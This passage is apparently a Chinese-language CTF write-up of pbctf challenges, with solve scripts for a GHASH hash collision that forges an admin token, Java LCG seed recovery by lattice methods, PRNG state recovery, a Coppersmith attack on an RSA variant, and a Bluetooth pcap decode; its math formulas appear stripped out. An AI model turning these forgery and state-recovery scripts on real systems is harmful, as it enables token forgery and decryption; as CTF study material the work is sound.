不過我們今天要的 collision 比較複雜,不只限定了輸入的字元還要求是合法的 json。把 token 加上 padding 之後可以拆成這樣的五個 blocks:

1
[b'{"token": "b3ea9', b'0a7b48bc6464fa63', b'xxxxxxxxxxx", "a', b'dmin": false}\x00\x00\x00', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe8']

我們要想辦法控制 blocks[3] == b'dmin": true }\x00\x00\x00',然後對其它的 blocks 作些改動使得 hash 還是相同的才行。

改動 blocks[3] 也就是把 換成 的意思,所以需要其他的 做些調整才能使其相等。假設我對 做的調整叫做 ,那麼有:

只要是符合以上等式的 的調整都一定會有相同的 hash,不過我們需要找調整之後還可以是 ACCEPTABLE 和 legal json 的方法。

我的作法是注意到 blocks[2] 有部分是 json 的 format,但是 blocks[1] 是允許你隨意改動的,所以先生成一個 blocks[2] == b'xxxxxxxxxxxx","a',其中 x 都是隨機的 ACCEPTABLE 字元。這樣就能得到 ,然後計算 之後把 轉回 bytes 之後檢查是不是全部都是 ACCEPTABLE,失敗的話就再來一次。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
from Crypto.Cipher import AES
from Crypto.Util.number import *
from sage.all import GF, PolynomialRing
import json
import os
import string
import random

ACCEPTABLE = (string.ascii_letters + string.digits + string.punctuation + " ").encode()


class GoodHash:
def __init__(self, v=b""):
self.key = b"goodhashGOODHASH"
self.buf = v

def update(self, v):
self.buf += v

def digest(self):
cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
return enc + tag

def hexdigest(self):
return self.digest().hex()


def xor(a, b):
return bytes(x ^ y for x, y in zip(a, b))


subkey = AES.new(b"goodhashGOODHASH", AES.MODE_ECB).encrypt(b"\0" * 16)


# GF(2^128) utility functions are copied and modified from https://github.com/bozhu/AES-GCM-Python/blob/master/test_gf_mul.sage

x = PolynomialRing(GF(2), "x").gen()
F = GF(2 ** 128, "a", x ** 128 + x ** 7 + x ** 2 + x + 1)
a = F.gen()


def int2ele(integer):
res = 0
for i in range(128):
# rightmost bit is x127
res += (integer & 1) * (a ** (127 - i))
integer >>= 1
return res


def bytes2ele(b):
return int2ele(bytes_to_long(b))


def ele2int(element):
integer = element.integer_representation()
res = 0
for _ in range(128):
res = (res << 1) + (integer & 1)
integer >>= 1
return res


def ele2bytes(ele):
return long_to_bytes(ele2int(ele), 16)


def ghash(H, XS):
# H: ele
# XS: ele[]
Y = int2ele(0)
for X in XS:
Y = (Y + X) * H
return Y


def pad(b: bytes):
fill = (16 - (len(b) % 16)) % 16 + 8
ghash_in = b + b"\x00" * fill + long_to_bytes(8 * len(b), 8)
return ghash_in


def to_blocks(b: bytes, sz=16):
return [b[i : i + sz] for i in range(0, len(b), 16)]


def find_collision(token, max_attempt=2 ** 14):
H = bytes2ele(subkey)
blocks = to_blocks(pad(token))
assert len(blocks) == 5
C = bytes2ele(b'dmin": true }\x00\x00\x00') + bytes2ele(blocks[3])
new_blocks = list(blocks)
new_blocks[3] = ele2bytes(bytes2ele(new_blocks[3]) + C)
ele2 = bytes2ele(new_blocks[2])
ele1 = bytes2ele(new_blocks[1])
H2 = H * H
for _ in range(max_attempt):
B = bytes2ele(bytes(random.sample(ACCEPTABLE, 12)) + b'","a') - ele2
A = (C - B * H) / H2
bA = ele2bytes(ele1 + A)
if all(x in ACCEPTABLE for x in bA):
break
else:
return
assert A * H ** 2 + B * H == C
new_blocks[1] = ele2bytes(bytes2ele(new_blocks[1]) + A)
new_blocks[2] = ele2bytes(bytes2ele(new_blocks[2]) + B)
fake_token = b"".join(new_blocks)[:-2].strip(b"\0")
assert GoodHash(fake_token).digest() == GoodHash(token).digest()
return fake_token


def main():
from pwn import remote, context

context.log_level = "error"

while True:
# io = process(["python", "main.py"])
io = remote("good-hash.chal.perfect.blue", 1337)
io.recvuntil(b"Body: ")
token = io.recvline().strip()
io.recvuntil(b"Hash: ")
hexhash = io.recvlineS().strip()
assert GoodHash(token).hexdigest() == hexhash
fake = find_collision(token)
if fake:
print(fake)
print(json.loads(fake))
io.sendline(fake)
print(io.recvallS())
break
print("next")
io.close()


main()

# run this script in 8 tmux windows, then sit down and pray one of them can find the correct one in a short time...
# pbctf{GHASH_is_short_for_GoodHash_:joy:}

這個非常暴力的隨機算法成功率真的相當低,但是以拿到 flag 為目標的話還是足夠的。對於每個 token 我最多只找 次,失敗就重新連線拿新的 token,然後把這個腳本用 tmux 在 8 個 pane 中同時執行,大概 5 分鐘左右才成功拿到 flag。

Seed Me

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import java.nio.file.Files;
import java.nio.file.Path;
import java.io.IOException;
import java.util.Random;
import java.util.Scanner;

class Main {

private static void printFlag() {
try {
System.out.println(Files.readString(Path.of("flag.txt")));
}
catch(IOException e) {
System.out.println("Flag file is missing, please contact admins");
}
}

public static void main(String[] args) {
int unlucky = 03777;
int success = 0;
int correct = 16;

System.out.println("Welcome to the 'Lucky Crystal Game'!");
System.out.println("Please provide a lucky seed:");
Scanner scr = new Scanner(System.in);
long seed = scr.nextLong();
Random rng = new Random(seed);

for(int i=0; i<correct; i++) {
/* Throw away the unlucky numbers */
for(int j=0; j<unlucky; j++) {
rng.nextFloat();
}

/* Do you feel lucky? */
if (rng.nextFloat() >= (7.331f*.1337f)) {
success++;
}
}

if (success == correct) {
printFlag();
}
else {
System.out.println("Unlucky!");
}
}
}

這個題目要你找一個 seed,目標要讓 Java 17 的 Random 每隔 2047 次之後的輸出超過 7.331 * 0.1337 ~= 0.98,重複 16 次。

首先,關於 Java 17 的 Random 可以在這邊查到資料,可知它是一個簡單的 LCG。公式為 s = (s * 0x5DEECE66D + 0xb) % (2 ** 48)。而其中的 nextFloat 是以 next(24) / ((float)(1 << 24)) 的方法實作的。

要達成這個目標也就代表需要讓每隔 2047 次的 state 要很接近 才行。

因為這是 LCG,那 16 次的輸出可以寫成:

而目標是讓 盡量接近 ,也就是 要夠小才行,所以 但是卻很接近 。利用這個和把 modulo 的部份改寫可以得到:

從這邊可以寫出這個 Lattice 的 Basis :

設定 的話有

這邊我用了 Inequality Solving with CVP。你只要給予 的上下界,然後它會幫你 rescale 得到一個 target vector 之後用 Babai CVP 幫你求出 的值的工具,如果要 的話也可以很容易的解回去。

我取的 上下界是直接抓大概 ,不過經過測試發現要抓大概 左右才能得到大概成功 14~15 次的 seed。

可以注意到不符的地方要不是第一個值稍微小於目標值,不然就是最後一個值會稍大於 所以就變很小了。我的解決方法就是自己手動微調 的上下界而已,調個幾次就找到了需要的 作為 seed,輸入到 remote 之後就能拿到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from operator import xor


class JavaRNG:
# about the detail of java 17 rng
# https://docs.oracle.com/en/java/javase/17/docs/api/java.base/java/util/Random.html
def __init__(self, seed):
self.seed = seed

def next(self):
self.seed = self.seed * 0x5DEECE66D + 0xB
return self.seed


Z = Zmod(2 ** 48)
P = PolynomialRing(Z, "s")
s = P.gen()

aa = []
bb = []
zz = []
rng = JavaRNG(s)
for _ in range(16):
for _ in range(2047):
rng.next()
z = rng.next()
# print(z)
zz.append(z)
b, a = z.change_ring(ZZ)
aa.append(a)
bb.append(b)
# print(((ZZ(z(xs)) >> 24) / (1 << 24)).n())

M = 2 ** 48
B = block_matrix(
[[matrix([1]), matrix(aa)], [matrix(len(aa), 1), matrix.identity(len(aa)) * M]]
)

load("solver.sage") # https://github.com/rkm0959/Inequality_Solving_with_CVP

# manually changing parameters...
vlb = [M - 3100000000000 for _ in range(len(bb))]
vlb[0] = M - 2900000000000
vub = [M - 2100000000000 for _ in range(len(bb))]
vub[-1] = M - 2400000000000

lb = [0] + [v - b for v, b in zip(vlb, bb)]
ub = [2 ** 48] + [v - b for v, b in zip(vub, bb)]
result, applied_weights, fin = solve(
matrix(B), list(lb), list(ub)
) # note, this function will mutate your B, lb and ub by default

s = ZZ(fin[0])
for z in zz:
r = ZZ(z(s))
o = ((r >> 24) / (1 << 24)).n()
print(o, o > 7.331 * 0.1337)

print(
xor(s, 0x5DEECE66D)
) # Java RNG will xor your seed with 0x5DEECE66D when setting seed

# one of the good seeds = 272404351039795
# pbctf{intended_is_LLL_with_branch_and_bound_9ad09becbc4c7685}

其實這題還有個不用會什麼 crypto 的另解 (從 DC 上複製來的):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package com.mycompany.app;
import com.seedfinding.latticg.reversal.*;
import com.seedfinding.latticg.reversal.calltype.java.JavaCalls;
import com.seedfinding.latticg.util.LCG;

public class App
{
public static final int unlucky = 2047;

public static void main( String[] args )
{
DynamicProgram device = DynamicProgram.create(LCG.JAVA);
for(int i=0; i<16; i++) {
device.skip(unlucky);
device.add(JavaCalls.nextFloat().greaterThan(0.98016f));
}
device.reverse().forEach(s -> System.out.println(s ^ 0x5DEECE66DL));
}
}

這個用的是 LattiCG,一個和破解 Java 的 LCG 有關的 Java Library,裡面也是有用 Lattice 和一些額外的策略去搜尋的工具。

作者的 Writeup 有說明這個題目其實和搜尋 Minecraft 的 seed 有關,這個影片有些更詳細的細節在裡面。像是前面的 LattiCG 就是和這個相關的結果。

Yet Another PRNG

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3

from Crypto.Util.number import *
import random
import os
from flag import flag

def urand(b):
return int.from_bytes(os.urandom(b), byteorder='big')

class PRNG:
def __init__(self):
self.m1 = 2 ** 32 - 107
self.m2 = 2 ** 32 - 5
self.m3 = 2 ** 32 - 209
self.M = 2 ** 64 - 59

rnd = random.Random(b'rbtree')

self.a1 = [rnd.getrandbits(20) for _ in range(3)]
self.a2 = [rnd.getrandbits(20) for _ in range(3)]
self.a3 = [rnd.getrandbits(20) for _ in range(3)]

self.x = [urand(4) for _ in range(3)]
self.y = [urand(4) for _ in range(3)]
self.z = [urand(4) for _ in range(3)]

def out(self):
o = (2 * self.m1 * self.x[0] - self.m3 * self.y[0] - self.m2 * self.z[0]) % self.M

self.x = self.x[1:] + [sum(x * y for x, y in zip(self.x, self.a1)) % self.m1]
self.y = self.y[1:] + [sum(x * y for x, y in zip(self.y, self.a2)) % self.m2]
self.z = self.z[1:] + [sum(x * y for x, y in zip(self.z, self.a3)) % self.m3]

return o.to_bytes(8, byteorder='big')

if __name__ == "__main__":
prng = PRNG()

hint = b''
for i in range(12):
hint += prng.out()

print(hint.hex())

assert len(flag) % 8 == 0
stream = b''
for i in range(len(flag) // 8):
stream += prng.out()

out = bytes([x ^ y for x, y in zip(flag, stream)])
print(out.hex())

這題的 PRNG 類似把三個類似 LFSR 的 PRNG 結合過的結果,但是這次我們沒辦法用攻擊一般 LFSR 的 correlation attack 去做,因為 modulus 都很大。

根據上面的 code 我們可以得出這幾條等式:

未知的初始狀態是 。其中的 因為都是從一個固定 seed 的 PRNG 生成的,所以都已知。

這些等式的 modulo 部分能用利用額外的未知數 來表示,所以這樣一共有 9+9*3+12=48 個未知數,但是只有 12 個輸出 所以會得到一個的 48x12 的係數矩陣 符合 。其中

之後我在那個係數矩陣的右邊的 48x36 的區塊的左上和右下分別加上了大小為 24 和 12 的單位矩陣得到 48x48 的 ,它符合

然後和前一題一樣使用 Inequality Solving with CVP 去解就可以了。 的上下界明顯是 ,而 的上下界根據我的測試大概是 的區間,而最後的 幾乎都是落在 之間。

的區間可能和你的 是怎麼設的有關,不一定和我的一樣

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
import random

with open("output.txt") as f:
stream = bytes.fromhex(f.readline().strip())
states = [
int.from_bytes(stream[i : i + 8], "big") for i in range(0, len(stream), 8)
]
assert len(states) == 12
ct = bytes.fromhex(f.readline().strip())

m1 = 2 ** 32 - 107
m2 = 2 ** 32 - 5
m3 = 2 ** 32 - 209
M = 2 ** 64 - 59
rnd = random.Random(b"rbtree")
a1 = [rnd.getrandbits(20) for _ in range(3)]
a2 = [rnd.getrandbits(20) for _ in range(3)]
a3 = [rnd.getrandbits(20) for _ in range(3)]

numk = 9 * 3 + 12
varstr = "x0,x1,x2,y0,y1,y2,z0,z1,z2," + ",".join(f"k{i}" for i in range(numk))
P = PolynomialRing(ZZ, varstr)
x0, x1, x2, y0, y1, y2, z0, z1, z2, *ks = P.gens()
polys = []

iks = iter(ks)

xs = [x0, x1, x2]
while len(xs) != 12:
xs += [sum(x * y for x, y in zip(a1, xs[-3:])) - next(iks) * m1]

ys = [y0, y1, y2]
while len(ys) != 12:
ys += [sum(x * y for x, y in zip(a2, ys[-3:])) - next(iks) * m2]

zs = [z0, z1, z2]
while len(zs) != 12:
zs += [sum(x * y for x, y in zip(a3, zs[-3:])) - next(iks) * m3]


sts = [2 * m1 * x - m3 * y - m2 * z - next(iks) * M for x, y, z in zip(xs, ys, zs)]

M, _ = Sequence(sts).coefficient_matrix()
print(vector(_))
M = M.dense_matrix().T
A = matrix.identity(24)
A = A.augment(matrix(24, 12))
B = matrix(12, 36)
C = matrix(12, 24)
C = C.augment(matrix.identity(12))
A = A.stack(B).stack(C)
M = M.augment(A)

print(M.dimensions())

lb = states + [0] * 9 + [0] * (36 - 9 - 12) + [-3] * 12
ub = states + [2 ** 32] * 9 + [2 ** 20] * (36 - 9 - 12) + [1] * 12

load("solver.sage") # https://github.com/rkm0959/Inequality_Solving_with_CVP

result, applied_weights, fin = solve(M, list(lb), list(ub)) # `solve` will mutate M, lb and ub

# M is already rescaled, although it is zero determinant, but the freedom seems to only affects the ks parts
# so the first 9 elements are correct based on my testing script
init_states = list(M.solve_left(result)[:9])

print(init_states)


class PRNG:
def __init__(self, init_states):
self.m1 = 2 ** 32 - 107
self.m2 = 2 ** 32 - 5
self.m3 = 2 ** 32 - 209
self.M = 2 ** 64 - 59

rnd = random.Random(b"rbtree")

self.a1 = [rnd.getrandbits(20) for _ in range(3)]
self.a2 = [rnd.getrandbits(20) for _ in range(3)]
self.a3 = [rnd.getrandbits(20) for _ in range(3)]

self.x = init_states[:3]
self.y = init_states[3:6]
self.z = init_states[6:]

def out(self):
o = (
2 * self.m1 * self.x[0] - self.m3 * self.y[0] - self.m2 * self.z[0]
) % self.M

self.x = self.x[1:] + [sum(x * y for x, y in zip(self.x, self.a1)) % self.m1]
self.y = self.y[1:] + [sum(x * y for x, y in zip(self.y, self.a2)) % self.m2]
self.z = self.z[1:] + [sum(x * y for x, y in zip(self.z, self.a3)) % self.m3]

return int(o).to_bytes(8, byteorder="big")

prng = PRNG(init_states)

for o in states:
assert int(o).to_bytes(8, "big") == prng.out()

flag = b""

for blk in [ct[i : i + 8] for i in range(0, len(ct), 8)]:
flag += bytes(a ^^ b for a, b in zip(blk, prng.out()))
print(flag)

# pbctf{Wow_how_did_you_solve_this?_I_thought_this_is_super_secure._Thank_you_for_solving_this!!!}

這個腳本在用 solve 的時候它會輸出 Zero Determinant,代表它會有多組解,所以 fin 的值會是 None。不過如果一樣使用 M.solve_left(result) 的話會得到其中一個可能的解,經過我的測試,雖然找出來的 和真正的 不一定相同,但是可以發現它的大部分的地方都是相同的,不同的地方都聚集在比較後面的維度上而已。

直接輸出一下可以發現 ,而 left kernel 中的 basis 可以發現都聚集在後面的維度 () 上面,這大概是為什麼這樣能成的原因。細節可以參考我的 test.sage

*Yet Another RSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python3

from Crypto.Util.number import *
import random


def genPrime():
while True:
a = random.getrandbits(256)
b = random.getrandbits(256)

if b % 3 == 0:
continue

p = a ** 2 + 3 * b ** 2
if p.bit_length() == 512 and p % 3 == 1 and isPrime(p):
return p


def add(P, Q, mod):
m, n = P
p, q = Q

if p is None:
return P
if m is None:
return Q

if n is None and q is None:
x = m * p % mod
y = (m + p) % mod
return (x, y)

if n is None and q is not None:
m, n, p, q = p, q, m, n

if q is None:
if (n + p) % mod != 0:
x = (m * p + 2) * inverse(n + p, mod) % mod
y = (m + n * p) * inverse(n + p, mod) % mod
return (x, y)
elif (m - n ** 2) % mod != 0:
x = (m * p + 2) * inverse(m - n ** 2, mod) % mod
return (x, None)
else:
return (None, None)
else:
if (m + p + n * q) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod
y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod
return (x, y)
elif (n * p + m * q + 2) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(n * p + m * q + 2, mod) % mod
return (x, None)
else:
return (None, None)


def power(P, a, mod):
res = (None, None)
t = P
while a > 0:
if a % 2:
res = add(res, t, mod)
t = add(t, t, mod)
a >>= 1
return res


def random_pad(msg, ln):
pad = bytes([random.getrandbits(8) for _ in range(ln - len(msg))])
return msg + pad


p, q = genPrime(), genPrime()
N = p * q
phi = (p ** 2 + p + 1) * (q ** 2 + q + 1)

print(f"N: {N}")

d = getPrime(400)
e = inverse(d, phi)
k = (e * d - 1) // phi

print(f"e: {e}")

to_enc = input("> ").encode()
ln = len(to_enc)

print(f"Length: {ln}")

pt1, pt2 = random_pad(to_enc[: ln // 2], 127), random_pad(to_enc[ln // 2 :], 127)

M = (bytes_to_long(pt1), bytes_to_long(pt2))
E = power(M, e, N)

print(f"E: {E}")

可以看到了它實作了一個類似 RSA 的東西,,然後還有個特殊的 add 以及 power 函數,power 單純是 add 的 double and add 版本而已。

經過一些測試可以很容易的發現 power(M, phi + 1, N) == M,所以只要能求出 之後就能解密。

這題我賽中的想法是注意到 只有 400 bits,異常的小,所以說不定能透過以 去近似 ,用 wiener attack 得到 ,不過實際上測試這個方法只有在 200 bits 的 才會成功,就這樣到比賽結束都解不掉。

解法是先推得

然後用 可知

然後 之後可以得到

這邊的 同樣大小,都是 400 bits。然後 約 512~513 bits 左右。一個容易被忽略的盲點是 是 2048 bits,所以 也是差不多的長度,所以 的大小符合 coppersmith 的 bounds,所以用 coppersmith 解出 之後就能直接分解拿 了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
from Crypto.Util.number import long_to_bytes

n = 144256630216944187431924086433849812983170198570608223980477643981288411926131676443308287340096924135462056948517281752227869929565308903867074862500573343002983355175153511114217974621808611898769986483079574834711126000758573854535492719555861644441486111787481991437034260519794550956436261351981910433997
e = 3707368479220744733571726540750753259445405727899482801808488969163282955043784626015661045208791445735104324971078077159704483273669299425140997283764223932182226369662807288034870448194924788578324330400316512624353654098480234449948104235411615925382583281250119023549314211844514770152528313431629816760072652712779256593182979385499602121142246388146708842518881888087812525877628088241817693653010042696818501996803568328076434256134092327939489753162277188254738521227525878768762350427661065365503303990620895441197813594863830379759714354078526269966835756517333300191015795169546996325254857519128137848289

P = PolynomialRing(Zmod(e), "k,s")
kk, ss = P.gens()
f = 1 + kk * (n ^ 2 + ss * (ss + n + 1) - n + 1)
load("~/workspace/coppersmith.sage")
k, s = small_roots(f, (2 ** 400, 2 ** 513), m=3, d=4)[0] # take ~1min
k, s = ZZ(k), ZZ(s)
print(f"{k = }")
print(f"{s = }")

sol = solve(x ^ 2 - s * x + n, (x,))
p = ZZ(sol[0].rhs())
q = ZZ(sol[1].rhs())
print(f"{p = }")
print(f"{q = }")
assert p * q == n
d = inverse_mod(e, (p ^ 2 + p + 1) * (q ^ 2 + q + 1))
print(f"{d = }")

E = (
123436198430194873732325455542939262925442894550254585187959633871500308906724541691939878155254576256828668497797665133666948295292931357138084736429120687210965244607624309318401630252879390876690703745923686523066858970889657405936739693579856446294147129278925763917931193355009144768735837045099705643710,
47541273409968525787215157367345217799670962322365266620205138560673682435124261201490399745911107194221278578548027762350505803895402642361588218984675152068555850664489960683700557733290322575811666851008831807845676036420822212108895321189197516787046785751929952668898176501871898974249100844515501819117,
)


def add(P, Q, mod):
m, n = P
p, q = Q

if p is None:
return P
if m is None:
return Q

if n is None and q is None:
x = m * p % mod
y = (m + p) % mod
return (x, y)

if n is None and q is not None:
m, n, p, q = p, q, m, n

if q is None:
if (n + p) % mod != 0:
x = (m * p + 2) * inverse_mod(n + p, mod) % mod
y = (m + n * p) * inverse_mod(n + p, mod) % mod
return (x, y)
elif (m - n ** 2) % mod != 0:
x = (m * p + 2) * inverse_mod(m - n ** 2, mod) % mod
return (x, None)
else:
return (None, None)
else:
if (m + p + n * q) % mod != 0:
x = (m * p + (n + q) * 2) * inverse_mod(m + p + n * q, mod) % mod
y = (n * p + m * q + 2) * inverse_mod(m + p + n * q, mod) % mod
return (x, y)
elif (n * p + m * q + 2) % mod != 0:
x = (m * p + (n + q) * 2) * inverse_mod(n * p + m * q + 2, mod) % mod
return (x, None)
else:
return (None, None)


def power(P, a, mod):
res = (None, None)
t = P
while a > 0:
if a % 2:
res = add(res, t, mod)
t = add(t, t, mod)
a >>= 1
return res


a, b = power(E, d, n)
print(long_to_bytes(a))
print(long_to_bytes(b))

# pbctf{I_love_to_read_crypto_papers_and_implement_the_attacks_from_them}

而那個奇怪的 addpower 據作者所說是這篇的內容。

Misc

BTLE

有個 pcap 檔,wireshark 打開看到有很多 Bluetooth Low Energy 的 PDU 在,可以看出它是一端的 client 向另一方進行寫入。仔細觀察一下一些 BTATT 的 PDU 可以看到寫入的時候都有一些 index 和 data,所以我寫了個腳本試著把傳送的 flag 還原出來就解掉了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pyshark

cap = pyshark.FileCapture("btle.pcap")

buf = bytearray(50)

for pdu in cap:
if hasattr(pdu, "btatt") and "Prepare Write Request" in str(pdu):
btatt = pdu.btatt
b = btatt.value.binary_value
i = int(btatt.offset)
buf[i : i + len(b)] = b
print(buf)

# pbctf{b1Ue_te3Th_is_ba4d_4_y0u_jUs7_4sk_HAr0lD_b1U3tO07h}

除了 pysharkscapy 好像也可以拿來讀 pcap